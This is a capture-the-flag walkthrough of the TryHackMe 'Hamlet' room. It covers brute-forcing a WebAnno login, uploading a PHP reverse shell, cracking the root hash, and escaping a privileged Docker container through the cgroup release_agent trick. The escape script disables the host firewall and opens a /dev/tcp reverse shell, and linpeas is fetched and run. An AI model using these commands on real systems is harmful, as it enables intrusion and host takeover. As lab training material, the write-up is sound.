Hamlet from TryHackMe

optimal
Jan 24, 2022

Today we are going to look at the Hamlet room from TryHackMe, a fun, CTF-style, medium-rated room. Let's jump in and get some enumeration done!

Initial enumeration

We'll start with an nmap scan to get things going (-A already implies -sV and -sC, so those two flags are redundant but harmless):

nmap 10.10.186.93 -sV -sC -A -p- -T4 -vv

nmap results

As we can see, nmap returned some interesting results, including what looks like an FTP server and an unidentified service listening on port 501. Let's take a closer look at these findings.

Information Gathering

Now that we know which ports are open, let's run a gobuster scan to see if we can dig up anything else before heading over to the web browser.

gobuster dir -u http://10.10.186.93 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt

gobuster scan

Nice, we got a couple of hits from that scan!

We can now take a look at all the ports and directories we found.

Navigating to the IP loads a landing page about a Hamlet Annotation Project, with a hyperlink embedded in it.

Landing page screenshot

Clicking the hyperlink takes us to /hamlet.txt, which contains a lot of text; port 8000 serves the same page.

hamlet.txt sample

Port 8080 takes us to a login portal that we will need to find a way into, and port 501 refused to load in the browser. Maybe there's another way to get information out of this port?

Login portal on 8080

Portal login

Let's see if the FTP server allows anonymous access, and if it does, have a poke around to see if there is anything of interest.

Brilliant, it let us in with anonymous access!

FTP Files

There are a couple of interesting files here: one gives us the password policy, which will come in handy for brute-forcing the login portal, and another gives us the ufw status. We can grab these files now and take a look.

Password policy

We now know there's a firewall in place and how a user should construct a password. Knowing this, plus the hint given in the room, we can use cewl to build a password list and then see if we can find anything that resembles a username.

cewl -w passwordlist.txt --lowercase -m 12 http://10.10.186.93/hamlet.txt

The command above scrapes /hamlet.txt for words, lowercases them and keeps only those of at least 12 characters (cewl's -m is a minimum length). The policy caps passwords at 14 characters, so trim anything longer from passwordlist.txt before using it; a smaller list is also a faster brute-force.
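As an added example (not from the original post), here is the same word-harvesting logic in plain shell, so the length and case rules from the policy can be checked and tuned without re-running cewl. It reads text on stdin; the sample text is a constructed stand-in for /hamlet.txt, not the room's real file.

```sh
#!/bin/sh
# Added example: a pure-shell equivalent of "cewl --lowercase -m MIN" plus the
# upper length bound the policy needs. Reads text on stdin.

# Usage: build_wordlist MIN MAX
# Splits on non-letters, lowercases, keeps MIN <= length <= MAX, dedupes.
build_wordlist() {
    tr -cs '[:alpha:]' '\n' \
        | tr '[:upper:]' '[:lower:]' \
        | awk -v min="$1" -v max="$2" 'length($0) >= min && length($0) <= max' \
        | sort -u
}

# Constructed sample input (a few lines of Hamlet plus one made-up line);
# not the room's hamlet.txt.
sample_text() {
    cat <<'EOF'
To be, or not to be, that is the question:
Whether 'tis nobler in the mind to suffer
The slings and arrows of outrageous fortune,
Or to take arms against a sea of troubles
And by opposing end them. To die, to sleep,
No more; and by a sleep to say we end
The heart-ache and the thousand natural shocks
That flesh is heir to: 'tis a consummation
Devoutly to be wish'd.
The gravedigger's misinterpreted annotation.
EOF
}

# How many candidates a given policy yields from the sample; useful for
# estimating how long a brute-force run will take before launching it.
count_candidates() {
    sample_text | build_wordlist "$1" "$2" | wc -l | tr -d ' '
}

# Example run against the sample:
#   sample_text | build_wordlist 12 14   -> consummation, misinterpreted
```

Against the real target you would feed the downloaded text in instead, e.g. `curl -s http://10.10.186.93/hamlet.txt | build_wordlist 12 14 > passwordlist.txt`. Note that hyphenated words such as "heart-ache" are split into their parts, exactly as cewl does, so if the policy allowed hyphens you would need to keep them in the tr character class.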

With our newly created password list in hand, we now need a suitable username to brute-force against so we can gain access to the login portal.

Looking at the Hamlet Annotation webpage, it appears that Michael goes by the nickname ‘ghost’. I'd bet that's the username for our login portal, so let's launch Burp and run an Intruder attack to see if we get a hit.

I know there are many ways to brute-force a login portal (Hydra etc.), but I usually have Burp open and it did the trick nicely: within a few minutes we had a user:pass match. Bear in mind that Burp Community Edition rate-limits Intruder, so for a larger wordlist Hydra would be the faster choice.

Burp sniper attack output

Question 1

What is Michael’s password?

Answer: {Redacted}

Before we head over and log into the portal, let's use the information from our gobuster scan to go and grab Flag 1!

Flag1

Answer:

flag 1

Now let's use our newly found credentials to gain access to the portal.

Boom! We have access.

Login portal

Now that we have access to the WebAnno portal, let's have a poke around to see what we can do and whether there is any other juicy information lying around.

So we have three users, admin, ghost and ophelia, and our account also has permission to change the passwords of all user accounts, which is the misconfiguration we abuse next. I changed the password for the user ‘admin’ and logged back in, which opened up more options to nosy through and find more juicy info.

Login portal as admin

After a good root around the WebAnno app, I found a snippet under Curation that Ophelia had written:

Ophelia curation note sample

If this isn't a WebAnno password, it is either for FTP access or for SSH. Trying to SSH in as ‘ophelia’ with the newly found password just kept giving an error, so I moved on and tried FTP.

We are golden! Let's have a rummage around the FTP server; maybe we will find flag 2.

FTP image

So here we have three directories on the FTP server; let's go through all of them!

FTP users

Let's work through each one from top to bottom. In gravediggers there are three files, and gravediggers.py looks really interesting. Having downloaded the Python file and looked inside, I found Flag 2. You can also do nc 10.10.186.93 501, where you will be prompted to answer a few questions and the end result will be flag 2; however, I found this hit-and-miss, as it always seemed to hang.

Flag 2

flag 2

Our next port of call is ophelia's directory, and look what she has left for us! Excellent, looks like we just nailed flag 3.

FTP image

Flag 3

flag 3

Sweet, we are now 50% of the way to completing this room. I reckon our next step is to get a reverse shell back to our machine. WebAnno lets us upload documents, so let's craft our reverse shell and see if we can get a foothold on this server.

Foothold

I'm using the PHP reverse shell payload from pentestmonkey, which I downloaded from here (remember to set the $ip and $port variables at the top of the file to your attack box and listener port before uploading).

As we can see, our reverse shell payload uploaded successfully.

file upload image

Now we need to find the path at which the uploaded file is served so we can execute it. I found two ways: the first is to navigate to the file over FTP and note the path taken; the other is to view the page source on port 8000, where you will see an iframe tag pointing at hamlet.txt.

iframe tag image

We know our payload is stored under documents, so we can assume the path will be /repository/project/0/document/1/source/rev.php. I'm using 1 after document on the assumption that each uploaded file gets the next sequential ID.

Let's give it a go and get a shell on the box.

Start a netcat listener on the port configured in the payload:

Then navigate to http://10.10.186.93:8000/repository/project/0/document/1/source/rev.php

We are in!!

www-data user image

One directory that stood out to me was stage; navigate there to find flag 4.

Flag 4

flag 4

Our next step is to escalate our privileges to root. If you display the contents of the shadow file (readable by our www-data user here, which is itself a misconfiguration worth noting), you will see the root hash, and with a bit of Google-fu you will find that the $y$ prefix means it was hashed with yescrypt.

Privilege Escalation

Let's use our old friend John to crack the root hash.

First we need to unshadow the hash, i.e. merge the passwd and shadow files we copied off the box into the format john expects:

unshadow passwd.txt shadow.txt > unshadowed.txt

Then let John work its magic. --format=crypt makes john call the system crypt(3), which is what understands the $y$ yescrypt hash; it is slower than john's native formats, but rockyou gets there:

john --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt unshadowed.txt
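As an added example (not from the original post), the helper below wraps the shadow-to-john step: it identifies the hash scheme from its crypt(3) prefix, picks the matching john --format (yescrypt falls back to crypt, as above), and re-implements what unshadow does. The passwd/shadow content is constructed and the root hash is an obvious placeholder, not the box's real hash.

```sh
#!/bin/sh
# Added example: shadow-file helpers for the john step. Sample data is
# constructed; the hash values are placeholders, not real credentials.

# Identify the crypt(3) scheme from the hash prefix.
hash_type() {
    case "$1" in
        '$y$'*)                  echo yescrypt ;;
        '$7$'*)                  echo scrypt ;;
        '$6$'*)                  echo sha512crypt ;;
        '$5$'*)                  echo sha256crypt ;;
        '$2a$'*|'$2b$'*|'$2y$'*) echo bcrypt ;;
        '$1$'*)                  echo md5crypt ;;
        '!'*|'*'*|'')            echo locked ;;   # no usable password
        *)                       echo unknown ;;
    esac
}

# Choose a john --format. Anything without a dedicated format here goes to
# "crypt", which hands hashing to the system crypt(3): needed for yescrypt,
# but slow, so use it only when you have to.
john_format() {
    t=$(hash_type "$1")
    case "$t" in
        sha512crypt|sha256crypt|md5crypt|bcrypt) echo "$t" ;;
        *)                                       echo crypt ;;
    esac
}

# Pull one user's hash out of shadow content on stdin.
shadow_hash() {
    awk -F: -v u="$1" '$1 == u { print $2; exit }'
}

# Minimal unshadow: replace field 2 of each passwd line with the shadow hash.
# Usage: unshadow_lite PASSWD_FILE SHADOW_FILE
unshadow_lite() {
    awk -F: -v OFS=: 'NR == FNR { h[$1] = $2; next } ($1 in h) { $2 = h[$1] } { print }' "$2" "$1"
}

# Constructed sample files (placeholder hash, not a real one).
TMPD=$(mktemp -d)
trap 'rm -rf "$TMPD"' EXIT
cat > "$TMPD/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
EOF
cat > "$TMPD/shadow" <<'EOF'
root:$y$j9T$EXAMPLESALTEXAMPLE$EXAMPLEHASHEXAMPLEHASHEXAMPLEHASHEXAMPLE:19000:0:99999:7:::
www-data:*:19000:0:99999:7:::
EOF

# Typical use once you have the two files off the box:
#   unshadow_lite passwd.txt shadow.txt > unshadowed.txt
#   john --format="$(john_format "$(shadow_hash root < shadow.txt)")" \
#        --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
```

The unshadow_lite output for the sample is the passwd line with the $y$ hash spliced in as field 2, which is exactly the line john parses; www-data keeps its "*" and is reported as locked, so there is no point feeding it to john.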

cracked root hash image

Let's escalate our privileges with the cracked password and get root access!

root access image

Navigating into the root directory, we find flag 5!

Flag 5

flag 5 image

Let's upload linpeas to the server, as it seems we are inside some kind of Docker container and we need to break out of it.

Set up a Python web server on your attack box (the curl below fetches from port 9000):

python server image

Then, on the victim box, change to the /tmp directory, fetch linpeas with curl -O http://10.11.59.188:9000/linpeas.sh, make it executable with chmod +x linpeas.sh, and run it!

Linpeas has confirmed we are trapped inside a container, but how do we escape?

Linpeas output image

Escaping The Container

It took me a little while to Google this one and find an exploit I could work with; I found the information in the link below of great use.

Having read all that, let's break out of this prison cell and root this box! The idea is simple: mount a cgroup hierarchy, enable notify_on_release on a child cgroup, and point release_agent at a script whose path the host kernel can resolve (our /cmd lives in the container's overlay upperdir on the host). When the last process leaves that cgroup, the host kernel runs the script as root on the host. This only works if the container has CAP_SYS_ADMIN (e.g. it was started with --privileged), and you need a second listener on port 9001 for the callback. The script also disables the host's ufw, which we saw earlier, so the callback isn't blocked.

# 1. Mount a cgroup hierarchy we control and create a child cgroup "x".
#    If the rdma controller is not available, "-o memory" works the same way.
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
# 2. Ask the kernel to run release_agent (on the host!) when "x" becomes empty.
echo 1 > /tmp/cgrp/x/notify_on_release
# 3. Find the host-side path of this container's overlay upperdir, so the path we
#    hand the host kernel resolves there ("\perdir=" matches the tail of "upperdir=").
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent

# 4. The script the host will execute as root: drop the host firewall we saw
#    earlier, then call back to our second listener on port 9001.
echo '#!/bin/bash' > /cmd
echo 'ufw --force disable' >> /cmd
echo "bash -i >& /dev/tcp/IP-GOES-HERE/9001 0>&1" >> /cmd
chmod a+x /cmd
# 5. Put a short-lived shell into "x"; when it exits the cgroup is empty and the
#    host kernel runs /cmd.
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
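The PoC above fails silently if its preconditions are not met, and the linpeas run earlier only tells us we are in a container. As an added example (not from the original post or the PoC it is based on), the checks below cover the three things a practitioner would verify before running it: that PID 1 really is in a container cgroup, that the effective capability set includes CAP_SYS_ADMIN (needed for the cgroup mount), and what host path the overlay upperdir resolves to (where /cmd will appear on the host). Each function reads the relevant file on stdin; the sample_* functions are constructed stand-ins for /proc/1/cgroup, /proc/self/status and /etc/mtab, with made-up container IDs and overlay paths.

```sh
#!/bin/sh
# Added example: pre-flight checks for the cgroup release_agent escape.
# Every sample_* body below is constructed, not captured from the room.

# Which runtime do PID 1's cgroup paths point at? (reads /proc/1/cgroup)
container_runtime() {
    awk '
        /docker|containerd/ { print "docker"; found = 1; exit }
        /lxc/               { print "lxc";    found = 1; exit }
        END { if (!found) print "none" }'
}

# Is CAP_SYS_ADMIN (capability bit 21) in the effective set?
# (reads /proc/self/status; prints yes/no/unknown)
has_cap_sys_admin() {
    hex=$(awk '/^CapEff:/ { print $2; exit }')
    [ -n "$hex" ] || { echo unknown; return; }
    if [ $(( (0x$hex >> 21) & 1 )) -eq 1 ]; then echo yes; else echo no; fi
}

# Host-side path of this container's writable layer, the overlay upperdir.
# The PoC's sed pattern "\perdir=" matches the tail of "upperdir="; this
# spells it out. (reads /etc/mtab)
overlay_upperdir() {
    sed -n 's/.*upperdir=\([^,]*\).*/\1/p' | head -n 1
}

# Overall verdict. Usage: escape_preflight CGROUP_FILE STATUS_FILE MTAB_FILE
# On a target: escape_preflight /proc/1/cgroup /proc/self/status /etc/mtab
escape_preflight() {
    rt=$(container_runtime < "$1")
    cap=$(has_cap_sys_admin < "$2")
    up=$(overlay_upperdir < "$3")
    if [ "$rt" != none ] && [ "$cap" = yes ] && [ -n "$up" ]; then
        echo "feasible: release_agent would run $up/cmd on the host"
    else
        echo "not feasible: runtime=$rt cap_sys_admin=$cap upperdir=${up:-none}"
    fi
}

# Constructed /proc/1/cgroup (cgroup v1, Docker-style paths; ID is made up).
sample_cgroup() {
    cat <<'EOF'
12:rdma:/
11:pids:/docker/7f3e2d1c0b9a8f7e6d5c4b3a2918273645
10:memory:/docker/7f3e2d1c0b9a8f7e6d5c4b3a2918273645
1:name=systemd:/docker/7f3e2d1c0b9a8f7e6d5c4b3a2918273645
EOF
}

# Constructed /proc/self/status excerpts: Docker's default capability set
# (no CAP_SYS_ADMIN) versus a --privileged container.
sample_status_default()    { printf 'Name:\tbash\nCapEff:\t00000000a80425fb\n'; }
sample_status_privileged() { printf 'Name:\tbash\nCapEff:\t0000003fffffffff\n'; }

# Constructed /etc/mtab root-mount line (overlay2 directory names are made up).
sample_mtab() {
    printf 'overlay / overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/AAAA:/var/lib/docker/overlay2/l/BBBB,upperdir=/var/lib/docker/overlay2/deadbeef/diff,workdir=/var/lib/docker/overlay2/deadbeef/work 0 0\n'
}
```

With the default Docker capability set the verdict is "not feasible" because bit 21 is clear, which is exactly the case where the mount in step 1 of the PoC returns EPERM; with the --privileged set it reports the host path that release_agent will execute, so you can confirm it matches what step 3 of the PoC extracts.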

Boom! We are free!!!!

root@hamlet image

Now let's go and retrieve flag 6.

Flag 6

flag 6

Hamlet is pwned! I thoroughly enjoyed this room and hope you have too. Until next time!
